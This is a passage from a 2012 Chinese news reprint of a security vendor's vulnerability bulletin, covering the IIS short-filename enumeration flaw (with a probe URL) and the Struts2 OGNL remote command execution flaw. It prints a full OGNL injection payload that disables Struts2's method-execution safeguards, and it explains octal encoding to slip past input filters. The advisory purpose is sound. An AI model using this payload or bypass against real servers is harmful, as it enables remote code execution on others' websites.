|
安恒信息7月漏洞预警 专家建议广大用户及时修复
http://www.cww.net.cn 2012年7月9日 15:03
Ø 5、漏洞描述 windows下通过~表示短文件名,如:test~1, 在IIs中可通过短我文件名的方式判断目标文件是否存在,从而降低文件名暴力猜解的难度。 Ø 6、漏洞检查方式 可使用 http://test/%2Fconnec~1.as*%2Fx.aspx 如果存在connec开头的asp,aspx等类似文件,将返回文件不存在的错误,否则将返回非法请求。 Ø 7、防护建议 目前没有官方补丁,建议使用安恒信息waf进行有效防护。 二、Apache Struts2导致大量使用此框架的网站沦陷,Apache Struts2 框架是在2010年7月14日被发现存在一个严重命令执行漏洞,但随之出现了防范技术,最近随着struts2带回显功能的POC被公布,出现大量的利用工具,并导致大量使用此框架的网站沦陷,并呈扩散趋势。 我们先来了解一下Apache Struts2,Struts2是在struts 和WebWork的技术基础上进行了合并后的全新框架。其全新的Struts 2的体系结构与Struts 1的体系结构的差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与Servlet API完全脱离开,所以Struts 2可以理解为WebWork的更新产品. 2010年期间Struts2爆发了一远程命令执行漏洞,曾经各种版本的漏洞利用工具让CNVD郁闷不已. Ø 漏洞细节 以POST的方式提交绕过对输入参数的部分过滤。 ?('\43_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(d))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(asdf)(('\43rp\75@org.apache.struts2.ServletActionContext@getResponse()')(c))&(fgd)(('\43rp.getWriter().print("dbappsecurity")')(d)) (grgr)(('\43rp.getWriter().close()')(d))=1 \75 (=的8进制)\40(空格的8进制)ongl语句中执行的参数不允许出现空格。当然包括其他老版本的正则 是^#=:都不允许,通杀的话是用\40来替代。 这样上面就是 1.设置上下文denyMethodExecution=false 运行方法执行 2.excludeProperties=@java.util.Collections@EMPTY_SET (@class@调用静态变量) 来源:通信世界网 编 辑:高娟 联系电话:010-67110006-853
文章评论【查看评论()】
|
企业黄页 会议活动 |